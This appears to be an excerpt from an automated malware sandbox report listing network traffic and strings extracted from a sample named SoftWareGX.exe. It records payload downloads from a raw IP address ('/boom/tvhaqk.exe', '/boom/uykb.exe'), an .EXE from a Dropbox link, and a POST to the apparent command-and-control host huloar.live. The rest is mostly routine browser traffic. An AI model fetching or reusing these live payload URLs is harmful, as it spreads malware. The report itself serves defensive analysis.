                Source: global trafficHTTP traffic detected: GET /mapuid?member=280&user=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D1CEEFCDF50C667711B38E95B514A66A6%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: receive-cookie-deprecation=1; XANDR_PANID=QJ6EpKlIWNPqYGslcOEkze-9PZL7nIN_bn62mRICfvL1xubrpgaXcfBWAi26PWKmKO5NLYGsjDV4ZQrR3sm8O6uLIyHSCPHgdvnpOxwuPI0.; anj=dTM7k!M4.FEVNsVF']wIg2HaOv]10$!EKyQ$=u?F6OGD?FqTVA6pQz:6T5jm+IA7WVDB096_526B.1PC+Se]WV8ubF-1Vl((#@am!*0qZ(SUc*!/INo*FAJ<; uuid2=3155402569559599506
                Source: global trafficHTTP traffic detected: GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D1CEEFCDF50C667711B38E95B514A66A6%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: receive-cookie-deprecation=1; XANDR_PANID=QJ6EpKlIWNPqYGslcOEkze-9PZL7nIN_bn62mRICfvL1xubrpgaXcfBWAi26PWKmKO5NLYGsjDV4ZQrR3sm8O6uLIyHSCPHgdvnpOxwuPI0.; uuid2=3155402569559599506; anj=dTM7k!M4.FEVNsVF']wIg2HaOv]10$!EKw[!GY/YIzaaZih.1^JIZjPJ-?S_52pL34L19PJBG>H`8@#b5+O?34RTEi6@(V.-bAA_!2>h9/+0J2!/Mq@+$x]>
                Source: global trafficHTTP traffic detected: GET /setuid?entity=483&code=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: receive-cookie-deprecation=1; XANDR_PANID=QJ6EpKlIWNPqYGslcOEkze-9PZL7nIN_bn62mRICfvL1xubrpgaXcfBWAi26PWKmKO5NLYGsjDV4ZQrR3sm8O6uLIyHSCPHgdvnpOxwuPI0.; uuid2=3155402569559599506; anj=dTM7k!M4.FEVNsVF']wIg2HaOv]10$NM-KxDQ7P*ih[Y32zCSeD0LyFqO:LrEsu:CEsKuzFbwzGnK-+qE<8k?FT0GC0C2sMb33xG%nugO%v4VB%np/l+)<m^
                Source: global trafficHTTP traffic detected: GET /scl/fi/ug8gna48ijslhqchxc0ec/67937ef0b237a.EXE?rlkey=tj0v2wuhbs6521y6cnm79fuqx&st=bykk7uvr&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: www.dropbox.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /notify/viewed?rid=68582199850e45b7ad01a954e30970e7&r=infopane&i=3&p=edgechrntp&l=en-us&d=bing&b=Edg&a=a1f4bbd0-e36a-4a8f-ac68-191af04c08d5&ii=1&c=8763910094378027791&bid=e457a23f-3387-4d40-86c4-2c5369d0b4f0&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; MUID=1CEEFCDF50C667711B38E95B514A66A6; _C_ETH=1
                Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1Host: c.clarity.msConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=67DE453363564AD4A9D18CF25CB2D8BE&MUID=1CEEFCDF50C667711B38E95B514A66A6 HTTP/1.1Host: c.clarity.msConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: SM=T; MUID=0EE0C9D7293667373922DC532D366918
                Source: global trafficHTTP traffic detected: GET /widgets/fullpage/distribution/edgewelcome?experiences=DistributionPage&ocid=edge-whatsnew HTTP/1.1Host: www.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; msnup=%7B%22cnex%22%3A%22no%22%7D; MUID=1CEEFCDF50C667711B38E95B514A66A6
                Source: global trafficHTTP traffic detected: GET /bundles/v1/distribution/latest/vendors.d049fb344a15489e568f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/distribution/latest/microsoft.a64b2be15baaa46efd42.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/distribution/latest/common.74c30d783e4080852d6b.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/distribution/latest/experience.10673c9254bd20a1cfe4.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /npm/@shoelace-style/shoelace@2.12.0/cdn/themes/light.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://apps.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BBj8zm6.img?w=16&h=16&q=100&m=6&f=png&u=t HTTP/1.1Host: img.s-msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /image?url=4rt9.lXDC4H_93laV1_eHHFT949fUipzkiFOBH3fAiZZUCdYojwUyX2aTonS1aIwMrx6NUIsHfUHSLzjGJFxxsG72wAo9EWJR4yQWyJJaDb6rYcBtJvTvH3UoAS4JFNDaxGhmKNaMwgElLURlRFeVkLCjkfnXmWtINWZIrPGYq0-&format=source&w=75 HTTP/1.1Host: images-eds-ssl.xboxlive.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apps.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic | HTTP traffic detected: GET /boom/tvhaqk.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /boom/uykb.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42
Source: Favicons.21.dr | String found in binary or memory: https://edge.microsoft.com/favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.facebook.com/&origin=PinningWizard equals www.facebook.com (Facebook)
Source: Favicons.21.dr | String found in binary or memory: https://edge.microsoft.com/favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.youtube.com/&origin=PinningWizard equals www.youtube.com (Youtube)
Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: 000003.log11.21.dr | String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log11.21.dr | String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log11.21.dr | String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 0www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 0www.youtube.com/F equals www.youtube.com (Youtube)
Source: Favicons.21.dr | String found in binary or memory: ?https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmp, Favicons.21.dr | String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/- equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.1451551802.000046FC03314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1460938291.000046FC03DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.1460938291.000046FC03DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/?feature=ytcaF equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.1460938291.000046FC03DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: www.youtube.com/F equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: t.me
Source: global traffic | DNS traffic detected: DNS query: huloar.live
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: apis.google.com
Source: global traffic | DNS traffic detected: DNS query: play.google.com
Source: global traffic | DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic | DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic | DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
Source: global traffic | DNS traffic detected: DNS query: c.msn.com
Source: global traffic | DNS traffic detected: DNS query: api.msn.com
Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic | DNS traffic detected: DNS query: www.dropbox.com
Source: unknown | HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ecbasjekf37qieu37qqiUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: huloar.liveContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundX-Cache: CONFIG_NOCACHEAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionX-MSEdge-Ref: Ref A: AF3910C8E8B84784A9AFAC09969FD93E Ref B: BL2AA2010201023 Ref C: 2025-01-30T17:11:31ZDate: Thu, 30 Jan 2025 17:11:31 GMTConnection: closeContent-Length: 0
Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D44000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.42
Source: csc.exe, 00000006.00000003.1281119543.0000000005017000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.1281481214.0000000004F41000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000003.1281713316.000000000501D000.00000004.00000020.00020000.00000000.sdmp, m3uz1vzd.0.cs.5.dr, m3uz1vzd.dll.6.dr | String found in binary or memory: http://147.45.44.42/boom/tvhaqk.exe
Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1306553287.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 0000000A.00000003.1296433045.0000000004D37000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1296398173.0000000004D27000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1296319511.0000000004D37000.00000004.00000020.00020000.00000000.sdmp, yomkssf4.dll.10.dr, yomkssf4.0.cs.5.dr | String found in binary or memory: http://147.45.44.42/boom/uykb.exe
Source: csc.exe, 0000000A.00000003.1297231127.00000000058E1000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.42/boom/uykb.exe0
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
